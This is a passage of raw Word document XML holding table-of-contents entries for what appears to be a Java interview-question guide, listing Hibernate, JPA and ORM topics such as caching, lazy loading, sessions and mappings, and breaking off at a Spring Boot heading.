              <w:instrText xml:space="preserve"> PAGEREF _Toc196308019 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>710</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33885A8F" w14:textId="33C9977D" w:rsidR="00012799" w:rsidRDefault="00012799">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308020" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hibernate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308020 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>713</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1106DEAB" w14:textId="4D7B6CE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2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noProof/>
              </w:rPr>
              <w:t>How data is persisted in database by using hibernate</w:t>
            </w:r>
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308021 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>713</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F98FADF" w14:textId="04338FB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2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retrieve select query using Hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308022 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>715</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ADD120E" w14:textId="763A2E8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2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retrieve data through hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308023 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>716</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E0A8325" w14:textId="1F77F4A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2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Hibernate Caching?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308024 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>717</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0455F70A" w14:textId="6A523FE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2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L1 and L2 cache in Hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308025 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>717</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70F2F0E1" w14:textId="559445D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2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the hibernate sessions?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308026 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>718</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="330FD50F" w14:textId="557E9E5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2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JDBC and Hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308027 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>719</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="016D7AE4" w14:textId="738DB9A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2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difference between get() and load() method in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308028 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>720</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60103985" w14:textId="0B26285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2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Performance tuning and indexing in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308029 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>720</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="697B821A" w14:textId="325E56D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3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different classes and annotations in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308030 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>721</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="423AFC22" w14:textId="1FCF86C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3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call stored procedures using hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308031 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>722</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BE77246" w14:textId="6931F1B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3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Many to many associations in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308032 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>723</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2917E40A" w14:textId="4A08413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3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JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308033 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>725</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="149409CF" w14:textId="7B957B2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3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a Session factory in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308034 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>726</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E490A31" w14:textId="4680463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3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If I want to retrieve a few entries from an employee table, how to retrieve employee details through JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308035 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>727</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2318B1ED" w14:textId="5D73662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3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a built-in function in JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308036 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>729</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="056E8673" w14:textId="502A595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3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lazy loading in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308037 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>731</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C28A9D6" w14:textId="71D4245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3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second level cache in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308038 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>732</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F08828F" w14:textId="3C9CB66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3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Can we use Hibernate without JPA?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308039 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>734</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44857FB1" w14:textId="39EFA86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4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are the advantages of ORM?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308040 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>737</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="508077AD" w14:textId="73A403B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4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HQL, JPQL and Native query?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308041 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>738</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B7C0189" w14:textId="1E6A56C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4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kind of fetching strategy are you using in hibernate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308042 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>739</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F53CEDF" w14:textId="7598C63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4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OneToMany mapping?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308043 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>741</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D33FC48" w14:textId="4F3AEAC4" w:rsidR="00012799" w:rsidRDefault="00012799">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308044" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Boot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
